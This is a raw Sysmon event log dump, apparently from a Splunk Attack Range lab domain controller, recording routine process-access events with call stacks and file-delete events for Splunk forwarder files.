22:53:00.020{05ADC7E1-229F-6039-0C00-00000000AD01}5888292C:\Windows\system32\svchost.exe{05ADC7E1-22AF-6039-2800-00000000AD01}1936C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001695112Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:53:00.020{05ADC7E1-229F-6039-0C00-00000000AD01}5888292C:\Windows\system32\svchost.exe{05ADC7E1-22AF-6039-2800-00000000AD01}1936C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001695111Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:53:00.020{05ADC7E1-229F-6039-0C00-00000000AD01}5888292C:\Windows\system32\svchost.exe{05ADC7E1-22AF-6039-2800-00000000AD01}1936C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001695110Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:53:00.020{05ADC7E1-229F-6039-0C00-00000000AD01}5888292C:\Windows\system32\svchost.exe{05ADC7E1-22AF-6039-2800-00000000AD01}1936C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001695109Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:53:00.020{05ADC7E1-229D-6039-0500-00000000AD01}636752C:\Windows\system32\csrss.exe{05ADC7E1-704C-603D-4388-00000000AD01}9024C:\Windows\explorer.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x80000000000000001695108Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:53:00.020{05ADC7E1-229F-6039-1600-00000000AD01}15407628C:\Windows\system32\svchost.exe{05ADC7E1-704C-603D-4388-00000000AD01}9024C:\Windows\explorer.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7354|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6f453|C:\Windows\System32\KERNEL32.DLL+1d37f|c:\windows\system32\UBPM.dll+acf0|c:\windows\system32\UBPM.dll+fa34|c:\windows\system32\UBPM.dll+cdcc|c:\windows\system32\UBPM.dll+d395|c:\windows\system32\UBPM.dll+dc95|c:\windows\system32\UBPM.dll+e9dd|c:\windows\system32\UBPM.dll+e1ba|c:\windows\system32\UBPM.dll+de12|c:\windows\system32\EventAggregation.dll+3e22|c:\windows\system32\EventAggregation.dll+36c9|c:\windows\system32\EventAggregation.dll+332f|c:\windows\system32\EventAggregation.dll+2e28|C:\Windows\SYSTEM32\ntdll.dll+65bf5|C:\Windows\SYSTEM32\ntdll.dll+658fd|C:\Windows\SYSTEM32\ntdll.dll+65760|C:\Windows\SYSTEM32\ntdll.dll+3a890|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001695107Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:53:00.020{05ADC7E1-229F-6039-0C00-00000000AD01}5888292C:\Windows\system32\svchost.exe{05ADC7E1-229F-6039-1600-00000000AD01}1540C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8b22|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001695225Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:53:01.832{05ADC7E1-229F-6039-0C00-00000000AD01}5887412C:\Windows\system32\svchost.exe{05ADC7E1-1E7B-603D-D17D-00000000AD01}4500C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+12eec|C:\Windows\SYSTEM32\psmserviceexthost.dll+15afb|C:\Windows\SYSTEM32\psmserviceexthost.dll+100ed|C:\Windows\SYSTEM32\psmserviceexthost.dll+10470|C:\Windows\SYSTEM32\psmserviceexthost.dll+13922|C:\Windows\SYSTEM32\psmserviceexthost.dll+160f9|C:\Windows\SYSTEM32\psmserviceexthost.dll+16bc3|C:\Windows\SYSTEM32\resourcepolicyserver.dll+1a70e|C:\Windows\SYSTEM32\resourcepolicyserver.dll+14fc2|C:\Windows\SYSTEM32\resourcepolicyserver.dll+c526|C:\Windows\SYSTEM32\resourcepolicyserver.dll+11927|C:\Windows\SYSTEM32\resourcepolicyserver.dll+b91a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000001695224Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:53:01.832{05ADC7E1-229F-6039-0C00-00000000AD01}5887412C:\Windows\system32\svchost.exe{05ADC7E1-1E7B-603D-D27D-00000000AD01}2752C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+12eec|C:\Windows\SYSTEM32\psmserviceexthost.dll+15afb|C:\Windows\SYSTEM32\psmserviceexthost.dll+100ed|C:\Windows\SYSTEM32\psmserviceexthost.dll+10470|C:\Windows\SYSTEM32\psmserviceexthost.dll+13922|C:\Windows\SYSTEM32\psmserviceexthost.dll+160f9|C:\Windows\SYSTEM32\psmserviceexthost.dll+16bc3|C:\Windows\SYSTEM32\resourcepolicyserver.dll+1a70e|C:\Windows\SYSTEM32\resourcepolicyserver.dll+14fc2|C:\Windows\SYSTEM32\resourcepolicyserver.dll+c526|C:\Windows\SYSTEM32\resourcepolicyserver.dll+11927|C:\Windows\SYSTEM32\resourcepolicyserver.dll+b91a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000001695223Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:53:01.832{05ADC7E1-229F-6039-0C00-00000000AD01}5887412C:\Windows\system32\svchost.exe{05ADC7E1-1E7B-603D-D17D-00000000AD01}4500C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+12eec|C:\Windows\SYSTEM32\psmserviceexthost.dll+15afb|C:\Windows\SYSTEM32\psmserviceexthost.dll+100ed|C:\Windows\SYSTEM32\psmserviceexthost.dll+10470|C:\Windows\SYSTEM32\psmserviceexthost.dll+13922|C:\Windows\SYSTEM32\psmserviceexthost.dll+160f9|C:\Windows\SYSTEM32\psmserviceexthost.dll+16bc3|C:\Windows\SYSTEM32\resourcepolicyserver.dll+1a70e|C:\Windows\SYSTEM32\resourcepolicyserver.dll+14fc2|C:\Windows\SYSTEM32\resourcepolicyserver.dll+c526|C:\Windows\SYSTEM32\resourcepolicyserver.dll+11927|C:\Windows\SYSTEM32\resourcepolicyserver.dll+b91a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000001695222Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:53:01.832{05ADC7E1-229F-6039-0C00-00000000AD01}5887412C:\Windows\system32\svchost.exe{05ADC7E1-1E7B-603D-D27D-00000000AD01}2752C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+12eec|C:\Windows\SYSTEM32\psmserviceexthost.dll+15afb|C:\Windows\SYSTEM32\psmserviceexthost.dll+100ed|C:\Windows\SYSTEM32\psmserviceexthost.dll+10470|C:\Windows\SYSTEM32\psmserviceexthost.dll+13922|C:\Windows\SYSTEM32\psmserviceexthost.dll+160f9|C:\Windows\SYSTEM32\psmserviceexthost.dll+16bc3|C:\Windows\SYSTEM32\resourcepolicyserver.dll+1a70e|C:\Windows\SYSTEM32\resourcepolicyserver.dll+14fc2|C:\Windows\SYSTEM32\resourcepolicyserver.dll+c526|C:\Windows\SYSTEM32\resourcepolicyserver.dll+11927|C:\Windows\SYSTEM32\resourcepolicyserver.dll+b91a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 23542300x80000000000000001695221Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:53:01.770{05ADC7E1-FB2E-603C-9079-00000000AD01}4328NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=D6A4B972669C4886E0FDBF2A9D582C06,SHA256=549CA05E4268A321F4D8A05828C3B633ED0B59A9A2B54167BEA8EF28572D659C,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001695220Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:53:01.629{05ADC7E1-FB1F-603C-5979-00000000AD01}6484NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeC:\Program Files\SplunkUniversalForwarder\var\run\serverclass.xmlMD5=D04DD730C2DFA173B41D98E6E0FBCE24,SHA256=25BD0354816452BB32A75B30DADE46EF8E59DD04BE7128F431B20468F632A399,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001695236Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:53:02.785{05ADC7E1-FB2E-603C-9079-00000000AD01}4328NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=909156966B83AC61A271B9671EA2F8BB,SHA256=EEF98867613A60DDDA164BE16DF8AB1B95D921640FDF079DEE133DD464ECB01C,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001695235Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:53:02.504{05ADC7E1-229F-6039-0C00-00000000AD01}5887908C:\Windows\system32\svchost.exe{05ADC7E1-1E7B-603D-D17D-00000000AD01}4500C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+12eec|C:\Windows\SYSTEM32\psmserviceexthost.dll+15afb|C:\Windows\SYSTEM32\psmserviceexthost.dll+100ed|C:\Windows\SYSTEM32\psmserviceexthost.dll+10470|C:\Windows\SYSTEM32\psmserviceexthost.dll+13922|C:\Windows\SYSTEM32\psmserviceexthost.dll+160f9|C:\Windows\SYSTEM32\psmserviceexthost.dll+16bc3|C:\Windows\SYSTEM32\resourcepolicyserver.dll+1a70e|C:\Windows\SYSTEM32\resourcepolicyserver.dll+14fc2|C:\Windows\SYSTEM32\resourcepolicyserver.dll+c61d|C:\Windows\SYSTEM32\resourcepolicyserver.dll+118d9|C:\Windows\SYSTEM32\resourcepolicyserver.dll+b91a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000001695234Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:53:02.504{05ADC7E1-229F-6039-0C00-00000000AD01}5887908C:\Windows\system32\svchost.exe{05ADC7E1-1E7B-603D-D27D-00000000AD01}2752C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+12eec|C:\Windows\SYSTEM32\psmserviceexthost.dll+15afb|C:\Windows\SYSTEM32\psmserviceexthost.dll+100ed|C:\Windows\SYSTEM32\psmserviceexthost.dll+10470|C:\Windows\SYSTEM32\psmserviceexthost.dll+13922|C:\Windows\SYSTEM32\psmserviceexthost.dll+160f9|C:\Windows\SYSTEM32\psmserviceexthost.dll+16bc3|C:\Windows\SYSTEM32\resourcepolicyserver.dll+1a70e|C:\Windows\SYSTEM32\resourcepolicyserver.dll+14fc2|C:\Windows\SYSTEM32\resourcepolicyserver.dll+c61d|C:\Windows\SYSTEM32\resourcepolicyserver.dll+118d9|C:\Windows\SYSTEM32\resourcepolicyserver.dll+b91a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000001695233Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:53:02.504{05ADC7E1-229F-6039-0C00-00000000AD01}588904C:\Windows\system32\svchost.exe{05ADC7E1-1E7B-603D-D27D-00000000AD01}2752C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\psmserviceexthost.dll+78b1|C:\Windows\SYSTEM32\psmserviceexthost.dll+74d7|C:\Windows\SYSTEM32\psmserviceexthost.dll+12f9e|C:\Windows\SYSTEM32\psmserviceexthost.dll+15afb|C:\Windows\SYSTEM32\psmserviceexthost.dll+100ed|C:\Windows\SYSTEM32\psmserviceexthost.dll+10470|C:\Windows\SYSTEM32\psmserviceexthost.dll+13922|C:\Windows\SYSTEM32\psmserviceexthost.dll+160f9|C:\Windows\SYSTEM32\psmserviceexthost.dll+16bc3|C:\Windows\SYSTEM32\resourcepolicyserver.dll+1a70e|C:\Windows\SYSTEM32\resourcepolicyserver.dll+14fc2|C:\Windows\SYSTEM32\resourcepolicyserver.dll+c61d|C:\Windows\SYSTEM32\resourcepolicyserver.dll+118d9|C:\Windows\SYSTEM32\resourcepolicyserver.dll+b91a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000001695232Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:53:02.504{05ADC7E1-229F-6039-0C00-00000000AD01}588904C:\Windows\system32\svchost.exe{05ADC7E1-1E7B-603D-D17D-00000000AD01}4500C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+12eec|C:\Windows\SYSTEM32\psmserviceexthost.dll+15afb|C:\Windows\SYSTEM32\psmserviceexthost.dll+100ed|C:\Windows\SYSTEM32\psmserviceexthost.dll+10470|C:\Windows\SYSTEM32\psmserviceexthost.dll+13922|C:\Windows\SYSTEM32\psmserviceexthost.dll+160f9|C:\Windows\SYSTEM32\psmserviceexthost.dll+16bc3|C:\Windows\SYSTEM32\resourcepolicyserver.dll+1a70e|C:\Windows\SYSTEM32\resourcepolicyserver.dll+14fc2|C:\Windows\SYSTEM32\resourcepolicyserver.dll+c61d|C:\Windows\SYSTEM32\resourcepolicyserver.dll+118d9|C:\Windows\SYSTEM32\resourcepolicyserver.dll+b91a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000001695231Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:53:02.504{05ADC7E1-229F-6039-0C00-00000000AD01}588904C:\Windows\system32\svchost.exe{05ADC7E1-1E7B-603D-D27D-00000000AD01}2752C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+12eec|C:\Windows\SYSTEM32\psmserviceexthost.dll+15afb|C:\Windows\SYSTEM32\psmserviceexthost.dll+100ed|C:\Windows\SYSTEM32\psmserviceexthost.dll+10470|C:\Windows\SYSTEM32\psmserviceexthost.dll+13922|C:\Windows\SYSTEM32\psmserviceexthost.dll+160f9|C:\Windows\SYSTEM32\psmserviceexthost.dll+16bc3|C:\Windows\SYSTEM32\resourcepolicyserver.dll+1a70e|C:\Windows\SYSTEM32\resourcepolicyserver.dll+14fc2|C:\Windows\SYSTEM32\resourcepolicyserver.dll+c61d|C:\Windows\SYSTEM32\resourcepolicyserver.dll+118d9|C:\Windows\SYSTEM32\resourcepolicyserver.dll+b91a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000001695230Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:53:02.504{05ADC7E1-29F2-6039-CC05-00000000AD01}31329136C:\Windows\system32\sihost.exe{05ADC7E1-1E7B-603D-D27D-00000000AD01}2752C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\SYSTEM32\usermgrcli.dll+1121|C:\Windows\System32\modernexecserver.dll+37dac|C:\Windows\System32\modernexecserver.dll+37d4f|C:\Windows\System32\modernexecserver.dll+375a6|C:\Windows\System32\modernexecserver.dll+1a1c4|C:\Windows\System32\modernexecserver.dll+3191d|C:\Windows\System32\modernexecserver.dll+32871|C:\Windows\System32\modernexecserver.dll+3278f|C:\Windows\SYSTEM32\ntdll.dll+2063e|C:\Windows\SYSTEM32\ntdll.dll+1e854|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001695229Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:53:02.332{05ADC7E1-229F-6039-0C00-00000000AD01}5887876C:\Windows\system32\svchost.exe{05ADC7E1-1E7B-603D-D27D-00000000AD01}2752C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\psmserviceexthost.dll+78b1|C:\Windows\SYSTEM32\psmserviceexthost.dll+74d7|C:\Windows\SYSTEM32\psmserviceexthost.dll+12f9e|C:\Windows\SYSTEM32\psmserviceexthost.dll+15afb|C:\Windows\SYSTEM32\psmserviceexthost.dll+100ed|C:\Windows\SYSTEM32\psmserviceexthost.dll+10470|C:\Windows\SYSTEM32\psmserviceexthost.dll+13922|C:\Windows\SYSTEM32\psmserviceexthost.dll+160f9|C:\Windows\SYSTEM32\psmserviceexthost.dll+16bc3|C:\Windows\SYSTEM32\resourcepolicyserver.dll+1a70e|C:\Windows\SYSTEM32\resourcepolicyserver.dll+14fc2|C:\Windows\SYSTEM32\resourcepolicyserver.dll+c61d|C:\Windows\SYSTEM32\resourcepolicyserver.dll+118d9|C:\Windows\SYSTEM32\resourcepolicyserver.dll+b91a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000001695228Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:53:02.332{05ADC7E1-229F-6039-0C00-00000000AD01}5887876C:\Windows\system32\svchost.exe{05ADC7E1-1E7B-603D-D17D-00000000AD01}4500C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+12eec|C:\Windows\SYSTEM32\psmserviceexthost.dll+15afb|C:\Windows\SYSTEM32\psmserviceexthost.dll+100ed|C:\Windows\SYSTEM32\psmserviceexthost.dll+10470|C:\Windows\SYSTEM32\psmserviceexthost.dll+13922|C:\Windows\SYSTEM32\psmserviceexthost.dll+160f9|C:\Windows\SYSTEM32\psmserviceexthost.dll+16bc3|C:\Windows\SYSTEM32\resourcepolicyserver.dll+1a70e|C:\Windows\SYSTEM32\resourcepolicyserver.dll+14fc2|C:\Windows\SYSTEM32\resourcepolicyserver.dll+c61d|C:\Windows\SYSTEM32\resourcepolicyserver.dll+118d9|C:\Windows\SYSTEM32\resourcepolicyserver.dll+b91a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 